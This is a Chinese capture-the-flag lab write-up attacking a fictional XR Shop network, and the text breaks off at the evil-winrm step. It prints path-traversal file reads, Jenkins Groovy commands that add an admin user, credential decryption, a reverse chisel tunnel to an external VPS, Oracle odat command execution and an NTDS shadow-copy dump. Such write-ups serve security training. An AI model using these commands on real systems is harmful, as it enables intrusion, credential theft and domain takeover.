当前位置：首页 > news >正文

[[春秋云境] Privilege仿真场景

news 来源：原创 2025/7/22 4:20:26

文章目录

- 靶标介绍：
- 知识点
- - 卷影拷贝(VSS)
- 外网
- - 任意文件读取
  - Jenkins管理员后台
  - rdp远程登录
  - Gitlab apiToken
- 内网
- - - 搭建代理
  - Oracle RCE
  - SeRestorePrivilege提权
  - mimikatz
  - spn
  - 卷影拷贝提取SAM
- 参考文章

靶标介绍：

在这个靶场中，您将扮演一名资深黑客，被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用，并通过后渗透技巧深入 XR Shop 的内部网络，寻找潜在的弱点和漏洞，并通过滥用 Windows 特权获取管理员权限，最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag，分布于不同的靶机。

考点

信息泄露
Jenkins初始管理员密码
jenkins后台RCE
Gitlab API Token
Oracle RCE
SeRestorePrivilege提权
SPN
卷影拷贝提取SAM

题目给的一些相关信息

第一关

请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins\.jenkins。

第二关

管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

第三关

攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。

第四关

尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

知识点

卷影拷贝(VSS)

利用 SeBackupPrivilege特权通过卷影拷贝读取系统受保护文件

VSS 是 Windows 提供的功能，用于创建文件系统的快照（snapshot），包括正在使用的文件。
SeBackupPrivilege 允许用户创建卷影拷贝并访问快照中的文件，即使这些文件在正常情况下被锁定或受 ACL 限制。
通过 VSS，可以读取 SAM 文件的副本，而无需直接访问原始文件。

一般利用步骤

创建并上传卷影拷贝脚本

本地创建 raj.dsh，写入以下内容

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

脚本作用: 生成 C 盘的卷影拷贝并将其挂载为 Z: 盘

set context persistent nowriters

设置卷影拷贝为持久模式（persistent），确保快照不会在脚本结束后自动删除
nowriters 避免备份过程中被写入操作干扰（如数据库文件正在被修改）

add volume c: alias raj

指定 C 盘为卷影拷贝的目标，并给快照取别名 raj。

create

执行创建卷影拷贝的操作，生成 C 盘的快照。

expose %raj% z:

将快照挂载为 Z: 盘，允许访问快照中的文件系统。

使用 unix2dos 转换格式

unix2dos raj.dsh

unix2dos 转换脚本的换行符格式，从 Unix 风格（LF）转换为 Windows 风格（CRLF），确保脚本在 Windows 环境中正确执行。

执行卷影拷贝

diskshadow /s raj.dsh

运行 diskshadow 工具，执行 raj.dsh 脚本，创建 C 盘的卷影拷贝并挂载为 Z: 盘

复制文件 (比如域控服务器里面的ntds.dit 文件)

RoboCopy /b z:\windows\ntds . ntds.dit

使用 RoboCopy 工具，以备份模式（/b）从卷影拷贝（Z: 盘）的 Z:\Windows\NTDS 目录复制 ntds.dit 文件到当前目录

RoboCopy：Windows 的高级文件复制工具，支持备份模式和 ACL 处理。

/b：备份模式，利用 SeBackupPrivilege 绕过文件 ACL 和锁定，允许复制受保护文件

z:\windows\ntds：源路径

.: 表示当前目录

ntds.dit: 要复制的具体文件

ntds.dit 是 Active Directory 的核心数据库，存储域内所有对象的信息，包括：
用户账户（用户名、SID、NTLM 哈希、Kerberos 密钥等）。
计算机账户。
组和权限信息。

外网

任意文件读取

fscan扫描一下

发现80端口wordpress的站点有源码泄露, 下载下来审计一下, 可以发现存在一个任意文件读取漏洞, 没有任何过滤

在这里插入图片描述

尝试读取flag (可以后面rdp登录后直接拿)

/tools/content-log.php?logfile=../../../../../../../../../Users\Administrator\flag\flag01.txt

在这里插入图片描述

根据第一关的提示, 读取Jenkins的密码, 告诉了Jenkins 配置目录为 C:\ProgramData\Jenkins\.jenkins

在 Jenkins 的默认配置中，初始管理员密码存储在 Jenkins 配置目录下的 secrets 子目录中的 initialAdminPassword 文件中

所以需要读取文件 C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

/tools/content-log.php?logfile=../../../../../../../../../ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

拿到密码: 510235cf43f14e83b88a9f144199655b

在这里插入图片描述

Jenkins管理员后台

拿到了密码就可以登录其8080端口了(fscan可以扫出来)

admin / 510235cf43f14e83b88a9f144199655b

在这里插入图片描述

jenkins在manage/script 路径下提供了一个脚本控制台,允许管理员在 Jenkins 实例上执行脚本代码, 常用的语言是 Groovy, 也能执行shell命令

http://39.99.129.242:8080/manage/script

权限很高

在这里插入图片描述

添加一个管理员用户, 方便rdp登录上去

println("net user xpw 123qwe! /add".execute().text)
println("net localgroup administrators xpw /add".execute().text)

rdp远程登录

在这里插入图片描述

传个fscan上去扫描一下内网 (用windows远程桌面连接默认共享c盘文件, 直接把工具放在这上面就行)

[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.7     存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.11    存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.16    存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.31    存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.46    存活 (ICMP)
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.7
主机名: XR-JENKINS
发现的网络接口:IPv4地址:└─ 172.22.14.7
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.7        状态码:200 长度:54603  标题:XR SHOP
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.46       状态码:200 长度:703    标题:IIS Windows Server
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.31
主机名: XR-ORACLE
发现的网络接口:IPv4地址:└─ 172.22.14.31
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.11
主机名: XR-DC
发现的网络接口:IPv4地址:└─ 172.22.14.11
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.7:8080   状态码:403 长度:548    标题:无标题
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.46
主机名: XR-0923
发现的网络接口:IPv4地址:└─ 172.22.14.46
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.46    XIAORANG\XR-0923
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.11    DC:XIAORANG\XR-DC
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.16       状态码:302 长度:99     标题:无标题 重定向地址: http://172.22.14.16/users/sign_in
[2025-05-14 01:23:22] [SUCCESS] 网站标题 http://172.22.14.16:8060  状态码:404 长度:555    标题:404 Not Found
[2025-05-14 01:23:27] [SUCCESS] 检测到漏洞 http://172.22.14.7:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]

172.22.14.7 	本机，已最高权限
172.22.14.46 	XIAORANG\XR-0923
172.22.14.11	DC:XIAORANG\XR-DC
172.22.14.31 	WORKGROUP\XR-ORACLE
172.22.14.16 	GitLab

Gitlab apiToken

根据题目里面的描述

管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

寻找api token,翻看一下它配置目录下的一些文件去找

C:/ProgramData/Jenkins/.jenkins/credentials.xml

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927"><domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"><entry><com.cloudbees.plugins.credentials.domains.Domain><specifications/></com.cloudbees.plugins.credentials.domains.Domain><java.util.concurrent.CopyOnWriteArrayList><com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0"><scope>GLOBAL</scope><id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id><description></description><apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken></com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl></java.util.concurrent.CopyOnWriteArrayList></entry></domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

这个文件里面可以找到apiToken

AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh

回jenkins脚本控制台那里解密一下, 参考如何从credentials.xml中解密Jenkins密码 - bestsrc

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

得到明文

glpat-7kD_qLH2PiQv_ywB9hz2

接下来可以利用这个token访问gitlab的一些信息

内网

搭建代理

先利用chisel搭建代理

服务端(vps)

./chisel server -p 8888 --reverse

客户端(受控主机)

chisel.exe client 8.154.17.163:8888 R:0.0.0.0:9383:socks

在这里插入图片描述

Oracle RCE

用API列出有权限访问的项目

proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

[{"id": 6,"description": null,"name": "Internal Secret","name_with_namespace": "XRLAB / Internal Secret","path": "internal-secret","path_with_namespace": "xrlab/internal-secret","created_at": "2022-12-25T08:30:12.362Z","default_branch": "main","tag_list": [],"topics": [],"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git","http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git","web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret","readme_url": null,"avatar_url": null,"forks_count": 0,"star_count": 0,"last_activity_at": "2022-12-25T08:30:12.362Z","namespace": {"id": 8,"name": "XRLAB","path": "xrlab","kind": "group","full_path": "xrlab","parent_id": null,"avatar_url": null,"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"},"_links": {"self": "http://gitlab.xiaorang.lab/api/v4/projects/6","issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues","merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests","repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches","labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels","events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events","members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members","cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"},"packages_enabled": true,"empty_repo": false,"archived": false,"visibility": "private","resolve_outdated_diff_discussions": false,"container_expiration_policy": {"cadence": "1d","enabled": false,"keep_n": 10,"older_than": "90d","name_regex": ".*","name_regex_keep": null,"next_run_at": "2022-12-26T08:30:12.373Z"},"issues_enabled": true,"merge_requests_enabled": true,"wiki_enabled": true,"jobs_enabled": true,"snippets_enabled": true,"container_registry_enabled": true,"service_desk_enabled": false,"service_desk_address": null,"can_create_merge_request_in": true,"issues_access_level": "enabled","repository_access_level": "enabled","merge_requests_access_level": "enabled","forking_access_level": "enabled","wiki_access_level": "enabled","builds_access_level": "enabled","snippets_access_level": "enabled","pages_access_level": "private","operations_access_level": "enabled","analytics_access_level": "enabled","container_registry_access_level": "enabled","security_and_compliance_access_level": "private","releases_access_level": "enabled","environments_access_level": "enabled","feature_flags_access_level": "enabled","infrastructure_access_level": "enabled","monitor_access_level": "enabled","emails_disabled": null,"shared_runners_enabled": true,"lfs_enabled": true,"creator_id": 2,"import_url": null,"import_type": null,"import_status": "none","open_issues_count": 0,"ci_default_git_depth": 20,"ci_forward_deployment_enabled": true,"ci_job_token_scope_enabled": false,"ci_separated_caches": true,"ci_opt_in_jwt": false,"ci_allow_fork_pipelines_to_run_in_parent_project": true,"public_jobs": true,"build_timeout": 3600,"auto_cancel_pending_pipelines": "enabled","ci_config_path": null,"shared_with_groups": [],"only_allow_merge_if_pipeline_succeeds": false,"allow_merge_on_skipped_pipeline": null,"restrict_user_defined_variables": false,"request_access_enabled": true,"only_allow_merge_if_all_discussions_are_resolved": false,"remove_source_branch_after_merge": true,"printing_merge_request_link_enabled": true,"merge_method": "merge","squash_option": "default_off","enforce_auth_checks_on_uploads": true,"suggestion_commit_message": null,"merge_commit_template": null,"squash_commit_template": null,"issue_branch_template": null,"auto_devops_enabled": true,"auto_devops_deploy_strategy": "continuous","autoclose_referenced_issues": true,"keep_latest_artifact": true,"runner_token_expiration_interval": null,"permissions": {"project_access": null,"group_access": {"access_level": 50,"notification_level": 3}}},{"id": 4,"description": null,"name": "XRAdmin","name_with_namespace": "XRLAB / XRAdmin","path": "xradmin","path_with_namespace": "xrlab/xradmin","created_at": "2022-12-25T07:48:16.751Z","default_branch": "main","tag_list": [],"topics": [],"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git","http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git","web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin","readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md","avatar_url": null,"forks_count": 0,"star_count": 0,"last_activity_at": "2023-05-30T10:27:31.762Z","namespace": {"id": 8,"name": "XRLAB","path": "xrlab","kind": "group","full_path": "xrlab","parent_id": null,"avatar_url": null,"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"},"_links": {"self": "http://gitlab.xiaorang.lab/api/v4/projects/4","issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues","merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests","repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches","labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels","events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events","members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members","cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"},"packages_enabled": true,"empty_repo": false,"archived": false,"visibility": "private","resolve_outdated_diff_discussions": false,"container_expiration_policy": {"cadence": "1d","enabled": false,"keep_n": 10,"older_than": "90d","name_regex": ".*","name_regex_keep": null,"next_run_at": "2022-12-26T07:48:16.788Z"},"issues_enabled": true,"merge_requests_enabled": true,"wiki_enabled": true,"jobs_enabled": true,"snippets_enabled": true,"container_registry_enabled": true,"service_desk_enabled": false,"service_desk_address": null,"can_create_merge_request_in": true,"issues_access_level": "enabled","repository_access_level": "enabled","merge_requests_access_level": "enabled","forking_access_level": "enabled","wiki_access_level": "enabled","builds_access_level": "enabled","snippets_access_level": "enabled","pages_access_level": "private","operations_access_level": "enabled","analytics_access_level": "enabled","container_registry_access_level": "enabled","security_and_compliance_access_level": "private","releases_access_level": "enabled","environments_access_level": "enabled","feature_flags_access_level": "enabled","infrastructure_access_level": "enabled","monitor_access_level": "enabled","emails_disabled": null,"shared_runners_enabled": true,"lfs_enabled": true,"creator_id": 2,"import_url": null,"import_type": null,"import_status": "none","open_issues_count": 0,"ci_default_git_depth": 20,"ci_forward_deployment_enabled": true,"ci_job_token_scope_enabled": false,"ci_separated_caches": true,"ci_opt_in_jwt": false,"ci_allow_fork_pipelines_to_run_in_parent_project": true,"public_jobs": true,"build_timeout": 3600,"auto_cancel_pending_pipelines": "enabled","ci_config_path": null,"shared_with_groups": [],"only_allow_merge_if_pipeline_succeeds": false,"allow_merge_on_skipped_pipeline": null,"restrict_user_defined_variables": false,"request_access_enabled": true,"only_allow_merge_if_all_discussions_are_resolved": false,"remove_source_branch_after_merge": true,"printing_merge_request_link_enabled": true,"merge_method": "merge","squash_option": "default_off","enforce_auth_checks_on_uploads": true,"suggestion_commit_message": null,"merge_commit_template": null,"squash_commit_template": null,"issue_branch_template": null,"auto_devops_enabled": false,"auto_devops_deploy_strategy": "continuous","autoclose_referenced_issues": true,"keep_latest_artifact": true,"runner_token_expiration_interval": null,"permissions": {"project_access": null,"group_access": {"access_level": 50,"notification_level": 3}}},{"id": 3,"description": null,"name": "Awenode","name_with_namespace": "XRLAB / Awenode","path": "awenode","path_with_namespace": "xrlab/awenode","created_at": "2022-12-25T07:46:43.635Z","default_branch": "master","tag_list": [],"topics": [],"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git","http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git","web_url": "http://gitlab.xiaorang.lab/xrlab/awenode","readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md","avatar_url": null,"forks_count": 0,"star_count": 0,"last_activity_at": "2022-12-25T07:46:43.635Z","namespace": {"id": 8,"name": "XRLAB","path": "xrlab","kind": "group","full_path": "xrlab","parent_id": null,"avatar_url": null,"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"},"_links": {"self": "http://gitlab.xiaorang.lab/api/v4/projects/3","issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues","merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests","repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches","labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels","events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events","members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members","cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"},"packages_enabled": true,"empty_repo": false,"archived": false,"visibility": "private","resolve_outdated_diff_discussions": false,"container_expiration_policy": {"cadence": "1d","enabled": false,"keep_n": 10,"older_than": "90d","name_regex": ".*","name_regex_keep": null,"next_run_at": "2022-12-26T07:46:44.614Z"},"issues_enabled": true,"merge_requests_enabled": true,"wiki_enabled": true,"jobs_enabled": true,"snippets_enabled": true,"container_registry_enabled": true,"service_desk_enabled": false,"service_desk_address": null,"can_create_merge_request_in": true,"issues_access_level": "enabled","repository_access_level": "enabled","merge_requests_access_level": "enabled","forking_access_level": "enabled","wiki_access_level": "enabled","builds_access_level": "enabled","snippets_access_level": "enabled","pages_access_level": "private","operations_access_level": "enabled","analytics_access_level": "enabled","container_registry_access_level": "enabled","security_and_compliance_access_level": "private","releases_access_level": "enabled","environments_access_level": "enabled","feature_flags_access_level": "enabled","infrastructure_access_level": "enabled","monitor_access_level": "enabled","emails_disabled": null,"shared_runners_enabled": true,"lfs_enabled": true,"creator_id": 2,"import_url": null,"import_type": "gitlab_project","import_status": "finished","open_issues_count": 0,"ci_default_git_depth": 20,"ci_forward_deployment_enabled": true,"ci_job_token_scope_enabled": false,"ci_separated_caches": true,"ci_opt_in_jwt": false,"ci_allow_fork_pipelines_to_run_in_parent_project": true,"public_jobs": true,"build_timeout": 3600,"auto_cancel_pending_pipelines": "enabled","ci_config_path": null,"shared_with_groups": [],"only_allow_merge_if_pipeline_succeeds": false,"allow_merge_on_skipped_pipeline": null,"restrict_user_defined_variables": false,"request_access_enabled": true,"only_allow_merge_if_all_discussions_are_resolved": false,"remove_source_branch_after_merge": true,"printing_merge_request_link_enabled": true,"merge_method": "merge","squash_option": "default_off","enforce_auth_checks_on_uploads": true,"suggestion_commit_message": null,"merge_commit_template": null,"squash_commit_template": null,"issue_branch_template": null,"auto_devops_enabled": true,"auto_devops_deploy_strategy": "continuous","autoclose_referenced_issues": true,"keep_latest_artifact": true,"runner_token_expiration_interval": null,"permissions": {"project_access": {"access_level": 40,"notification_level": null},"group_access": {"access_level": 50,"notification_level": 3}}},{"id": 2,"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook","name": "XRWiki","name_with_namespace": "XRLAB / XRWiki","path": "xrwiki","path_with_namespace": "xrlab/xrwiki","created_at": "2022-12-25T07:44:18.589Z","default_branch": "master","tag_list": [],"topics": [],"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git","http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git","web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki","readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md","avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png","forks_count": 0,"star_count": 0,"last_activity_at": "2022-12-25T07:44:18.589Z","namespace": {"id": 8,"name": "XRLAB","path": "xrlab","kind": "group","full_path": "xrlab","parent_id": null,"avatar_url": null,"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"},"_links": {"self": "http://gitlab.xiaorang.lab/api/v4/projects/2","issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues","merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests","repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches","labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels","events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events","members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members","cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"},"packages_enabled": true,"empty_repo": false,"archived": false,"visibility": "private","resolve_outdated_diff_discussions": null,"container_expiration_policy": {"cadence": "1d","enabled": false,"keep_n": 10,"older_than": "90d","name_regex": ".*","name_regex_keep": null,"next_run_at": "2022-12-26T07:44:18.627Z"},"issues_enabled": true,"merge_requests_enabled": true,"wiki_enabled": false,"jobs_enabled": true,"snippets_enabled": false,"container_registry_enabled": false,"service_desk_enabled": false,"service_desk_address": null,"can_create_merge_request_in": true,"issues_access_level": "enabled","repository_access_level": "enabled","merge_requests_access_level": "enabled","forking_access_level": "enabled","wiki_access_level": "disabled","builds_access_level": "enabled","snippets_access_level": "disabled","pages_access_level": "public","operations_access_level": "enabled","analytics_access_level": "enabled","container_registry_access_level": "disabled","security_and_compliance_access_level": "private","releases_access_level": "enabled","environments_access_level": "enabled","feature_flags_access_level": "enabled","infrastructure_access_level": "enabled","monitor_access_level": "enabled","emails_disabled": null,"shared_runners_enabled": true,"lfs_enabled": true,"creator_id": 2,"import_url": null,"import_type": "gitlab_project","import_status": "finished","open_issues_count": 0,"ci_default_git_depth": 20,"ci_forward_deployment_enabled": true,"ci_job_token_scope_enabled": false,"ci_separated_caches": true,"ci_opt_in_jwt": false,"ci_allow_fork_pipelines_to_run_in_parent_project": true,"public_jobs": true,"build_timeout": 3600,"auto_cancel_pending_pipelines": "enabled","ci_config_path": null,"shared_with_groups": [],"only_allow_merge_if_pipeline_succeeds": false,"allow_merge_on_skipped_pipeline": null,"restrict_user_defined_variables": false,"request_access_enabled": false,"only_allow_merge_if_all_discussions_are_resolved": false,"remove_source_branch_after_merge": true,"printing_merge_request_link_enabled": true,"merge_method": "merge","squash_option": "default_off","enforce_auth_checks_on_uploads": true,"suggestion_commit_message": null,"merge_commit_template": null,"squash_commit_template": null,"issue_branch_template": null,"auto_devops_enabled": true,"auto_devops_deploy_strategy": "continuous","autoclose_referenced_issues": true,"keep_latest_artifact": true,"runner_token_expiration_interval": null,"permissions": {"project_access": {"access_level": 40,"notification_level": null},"group_access": {"access_level": 50,"notification_level": 3}}},{"id": 1,"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).","name": "Monitoring","name_with_namespace": "GitLab Instance / Monitoring","path": "Monitoring","path_with_namespace": "gitlab-instance-23352f48/Monitoring","created_at": "2022-12-25T07:18:20.914Z","default_branch": "main","tag_list": [],"topics": [],"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git","http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git","web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring","readme_url": null,"avatar_url": null,"forks_count": 0,"star_count": 0,"last_activity_at": "2022-12-25T07:18:20.914Z","namespace": {"id": 2,"name": "GitLab Instance","path": "gitlab-instance-23352f48","kind": "group","full_path": "gitlab-instance-23352f48","parent_id": null,"avatar_url": null,"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"},"_links": {"self": "http://gitlab.xiaorang.lab/api/v4/projects/1","issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues","merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests","repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches","labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels","events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events","members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members","cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"},"packages_enabled": true,"empty_repo": true,"archived": false,"visibility": "internal","resolve_outdated_diff_discussions": false,"container_expiration_policy": {"cadence": "1d","enabled": false,"keep_n": 10,"older_than": "90d","name_regex": ".*","name_regex_keep": null,"next_run_at": "2022-12-26T07:18:21.108Z"},"issues_enabled": true,"merge_requests_enabled": true,"wiki_enabled": true,"jobs_enabled": true,"snippets_enabled": true,"container_registry_enabled": true,"service_desk_enabled": false,"can_create_merge_request_in": true,"issues_access_level": "enabled","repository_access_level": "enabled","merge_requests_access_level": "enabled","forking_access_level": "enabled","wiki_access_level": "enabled","builds_access_level": "enabled","snippets_access_level": "enabled","pages_access_level": "private","operations_access_level": "enabled","analytics_access_level": "enabled","container_registry_access_level": "enabled","security_and_compliance_access_level": "private","releases_access_level": "enabled","environments_access_level": "enabled","feature_flags_access_level": "enabled","infrastructure_access_level": "enabled","monitor_access_level": "enabled","emails_disabled": null,"shared_runners_enabled": true,"lfs_enabled": true,"creator_id": 1,"import_status": "none","open_issues_count": 0,"ci_default_git_depth": 20,"ci_forward_deployment_enabled": true,"ci_job_token_scope_enabled": false,"ci_separated_caches": true,"ci_opt_in_jwt": false,"ci_allow_fork_pipelines_to_run_in_parent_project": true,"public_jobs": true,"build_timeout": 3600,"auto_cancel_pending_pipelines": "enabled","ci_config_path": null,"shared_with_groups": [],"only_allow_merge_if_pipeline_succeeds": false,"allow_merge_on_skipped_pipeline": null,"restrict_user_defined_variables": false,"request_access_enabled": true,"only_allow_merge_if_all_discussions_are_resolved": false,"remove_source_branch_after_merge": true,"printing_merge_request_link_enabled": true,"merge_method": "merge","squash_option": "default_off","enforce_auth_checks_on_uploads": true,"suggestion_commit_message": null,"merge_commit_template": null,"squash_commit_template": null,"issue_branch_template": null,"auto_devops_enabled": true,"auto_devops_deploy_strategy": "continuous","autoclose_referenced_issues": true,"keep_latest_artifact": true,"runner_token_expiration_interval": null,"permissions": {"project_access": null,"group_access": null}}
]

把一些项目克隆下来看看

proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.gitproxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.gitproxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git

在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账号和密码

在这里插入图片描述

可以通过navicat连接数据库查看, 不过可能会出现一些报错, 可以通过这篇文章解决
https://blog.csdn.net/qq_38974638/article/details/115069664

但也可以不需要连接上去, 可以通过odat直接执行命令,xradmin用户具有 SYSDBA 权限

odat是一个专门用于渗透测试 Oracle 数据库的开源工具

添加管理员账户方便远程连接rdp上去

proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user xpw 123qwe! /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators xpw /add'

dbmsscheduler 是 odat 的一个模块，利用 Oracle 的 DBMS_SCHEDULER 包,这个包允许创建调度任务，这些任务可以在数据库服务器上运行 shell 命令（如果权限足够）`

-s: 指定数据库服务器
-p: 指定端口
-d: 指定数据库 SID（系统标识符）或服务名称
--sysdba: 使用 SYSDBA 权限连接到数据库, SYSDBA 是 Oracle 数据库中的高特权角色，授予对数据库的完全管理访问权限，并且通常能够执行作系统命令。
--exec: 执行shell命令

在这里插入图片描述

添加完管理员账号之后直接rdp连接上去

proxychains4 xfreerdp /u:xpw /p:123qwe!  /v:172.22.14.31 /drive:share,/mnt/xpw/kali_shard

可以直接查看flag

在这里插入图片描述

SeRestorePrivilege提权

之前git clone的项目里面还有一个存储了很多账户的文件

internal-secret/credentials.txt

找到一个 XR-0923的账号密码, 前面fscan扫内网可以扫到这个主机

172.22.14.46 	XIAORANG\XR-0923

在这里插入图片描述

用这个用户名rdp上去 (权限不足无法查看flag)

proxychains4 xfreerdp /u:zhangshuai /p:wSbEajHzZs  /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard

查看一下这个用户的一些信息

whoami /priv #查看用户的特权
net user zhangshuai #查看用户的详细信息

会发现用户在Remote Management Users组内(远程管理用户组)

可以通过WinRM协议进行远程管理，而evil-winrm正是利用WinRM协议的工具
默认情况下，WinRM使用端口5985（HTTP）或5986（HTTPS）, 可以看到系统开放了相应的端口, 所以可以使用evil-winrm工具进行连接

在这里插入图片描述

evil-winrm连接

